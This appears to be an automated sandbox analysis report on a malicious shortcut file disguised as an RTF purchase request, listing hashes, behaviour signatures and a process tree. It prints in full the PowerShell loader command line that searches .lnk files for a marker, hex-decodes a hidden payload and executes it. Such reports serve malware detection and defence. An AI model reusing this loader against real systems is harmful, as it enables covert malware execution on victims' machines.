Analysis
- max time kernel: 119s
- max time network: 141s
- platform: windows7_x64
- resource: win7-en-20210920
- submitted: 14-10-2021 12:17
Static task: static1

Behavioral task: behavioral1
- Sample: 2145RFQ14102021.rtf.lnk
- Resource: win7-en-20210920 (windows7_x64)
- 0 signatures, 0 seconds

Behavioral task: behavioral2
- Sample: 2145RFQ14102021.rtf.lnk
- Resource: win10-en-20210920 (windows10_x64)
- 0 signatures, 0 seconds
General
- Target: 2145RFQ14102021.rtf.lnk
- Size: 5.4MB
- MD5: 85e44c6e99f5f4043fc2c993b6fa633b
- SHA1: 21b3e0a10dd9798ef71fe073cdad7cfdadbfdeae
- SHA256: 62fab79e945bc629c110f21c9db37c8c0cc441ad15e73c1c1349fbef986b3789
- SHA512: 7c2f7183d40ac7bab91fa1a572c625e38e8f7ec848d54b7a937b6a33acc5868df3af72ae3a6187e8720303ff7aa7d00e7895ff77adfd504d8b394dacb34d30ff
- Score: 3/10
Malware Config
Signatures
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (1 IoCs)
  Processes: powershell.exe (PID 1880)
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes: powershell.exe (PID 1880), Token: SeDebugPrivilege
- Suspicious use of WriteProcessMemory (3 IoCs)
  Processes: cmd.exe (PID 1480) wrote to memory of powershell.exe (PID 1880); three identical entries
Processes
- C:\Windows\system32\cmd.exe (PID 1480)
  Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\2145RFQ14102021.rtf.lnk
  Signatures: Suspicious use of WriteProcessMemory
  - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1880, child of cmd.exe)
    Command line: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function mT($gL) {$mW = $Null;Get-ChildItem $gL -Recurse -Depth 1 -ErrorAction 'SilentlyContinue' | ? {$_.extension -eq '.lnk'} | % {$yq = [String](Get-Content $_.FullName);$pH = 'VXJKUHSCSOQOTVAQOTOSEHMTYRYGQZIM';$lG = $yq.IndexOf($pH);if($lG -ne -1) {$Gc = $yq.SubString($lG);$mW = $Gc.Replace($pH,'')}};return $mW};function P($z) {$G = [Text.StringBuilder]::New();for($UzG=0;$UzG -lt $z.Length;$UzG+=2){[void]$G.Append([char][int]('0x'+$z.Substring($UzG,2)))}return $G.ToString()}$mW = mT $(Get-Location).Path;if($mW -eq $Null) {$mW = mT $($env:TEMP)};$wb = [ScriptBlock]::Create((P $mW));$wb.Invoke();
    Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- memory/1480-54-0x000007FEFB711000-0x000007FEFB713000-memory.dmp (8KB)
- memory/1880-55-0x0000000000000000-mapping.dmp
- memory/1880-57-0x000007FEF2170000-0x000007FEF2CCD000-memory.dmp (11.4MB)
- memory/1880-61-0x0000000002554000-0x0000000002557000-memory.dmp (12KB)
- memory/1880-60-0x0000000002552000-0x0000000002554000-memory.dmp (8KB)
- memory/1880-59-0x0000000002550000-0x0000000002552000-memory.dmp (8KB)
- memory/1880-58-0x000000001B700000-0x000000001B9FF000-memory.dmp (3.0MB)
- memory/1880-62-0x000000000255B000-0x000000000257A000-memory.dmp (124KB)
- memory/1880-63-0x000000000257E000-0x000000000257F000-memory.dmp (4KB)